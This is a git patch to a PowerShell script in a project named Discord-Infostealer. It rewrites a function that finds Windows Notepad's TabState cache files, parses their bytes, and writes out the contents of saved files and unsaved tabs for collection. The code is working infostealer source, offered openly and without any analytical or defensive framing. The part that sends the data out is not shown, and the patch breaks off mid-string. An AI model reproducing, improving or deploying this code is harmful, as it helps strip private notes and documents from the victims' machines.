From 74e2ef85b432a5d97410c7a57d0b730066ea6b7b Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 13 Mar 2024 16:00:20 +0000 Subject: [PATCH] Update main.ps1 --- Discord-Infostealer/main.ps1 | 84 +++++++++++++++++++----------------- 1 file changed, 45 insertions(+), 39 deletions(-) diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1 index d0d9363..ace2837 100644 --- a/Discord-Infostealer/main.ps1 +++ b/Discord-Infostealer/main.ps1 @@ -170,48 +170,54 @@ else{ } function EnumNotepad{ - $appDataDir = [Environment]::GetFolderPath('LocalApplicationData') - $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" - $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory - foreach ($dir in $matchingDirectories) { - $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState' - $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin - foreach ($fullFilePath in $listOfBinFiles) { - if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') { - continue - } - $seperator = ("=" * 60) - $SMseperator = ("-" * 60) - $seperator | Out-File -FilePath $outpath -Append - $filename = $fullFilePath.Name - $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName) - $isSavedFile = $contents[3] - if ($isSavedFile -eq 1) { - $lengthOfFilename = $contents[4] - $filenameEnding = 5 + $lengthOfFilename * 2 - $originalFilename = [System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)]) - "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append - $filename | Out-File -FilePath $outpath -Append - $SMseperator | Out-File -FilePath $outpath -Append - Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append - } else { - "Found an unsaved tab!" | Out-File -FilePath $outpath -Append - $filename | Out-File -FilePath $outpath -Append - $SMseperator | Out-File -FilePath $outpath -Append - $filenameEnding = 0 - $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding) - $delimeterEnd = [array]::IndexOf($contents, 1, $filenameEnding) - - $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)] - $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ }) - - $originalFileContents = [System.Text.Encoding]::Unicode.GetString($contents[($delimeterEnd + 4 + $fileMarker.Length)..($contents.Length - 6)]) - $originalFileContents | Out-File -FilePath $outpath -Append - } - "`n" | Out-File -FilePath $outpath -Append + +$appDataDir = [Environment]::GetFolderPath('LocalApplicationData') +$directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" +$matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory +foreach ($dir in $matchingDirectories) { + $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState' + $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin + foreach ($fullFilePath in $listOfBinFiles) { + if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') { + continue } + $seperator = ("=" * 60) + $SMseperator = ("-" * 60) + $seperator | Out-File -FilePath $outpath -Append + $filename = $fullFilePath.Name + $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName) + $isSavedFile = $contents[3] + if ($isSavedFile -eq 1) { + $lengthOfFilename = $contents[4] + $filenameEnding = 5 + $lengthOfFilename * 2 + $originalFilename = [System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)]) + "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append + + } else { + "Found an unsaved tab!" | Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + $filenameEnding = 0 + $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding) + $delimeterEnd = [array]::IndexOf($contents, 3, $filenameEnding) + $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)] + $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ }) + $originalFileBytes = $contents[($delimeterEnd + 9 + $fileMarker.Length)..($contents.Length - 6)] + $originalFileContent = "" + for ($i = 0; $i -lt $originalFileBytes.Length; $i++) { + if ($originalFileBytes[$i] -ne 0) { + $originalFileContent += [char]$originalFileBytes[$i] + } + } + $originalFileContent | Out-File -FilePath $outpath -Append + } + "`n" | Out-File -FilePath $outpath -Append } } +} $infomessage = " ==================================================================================================================================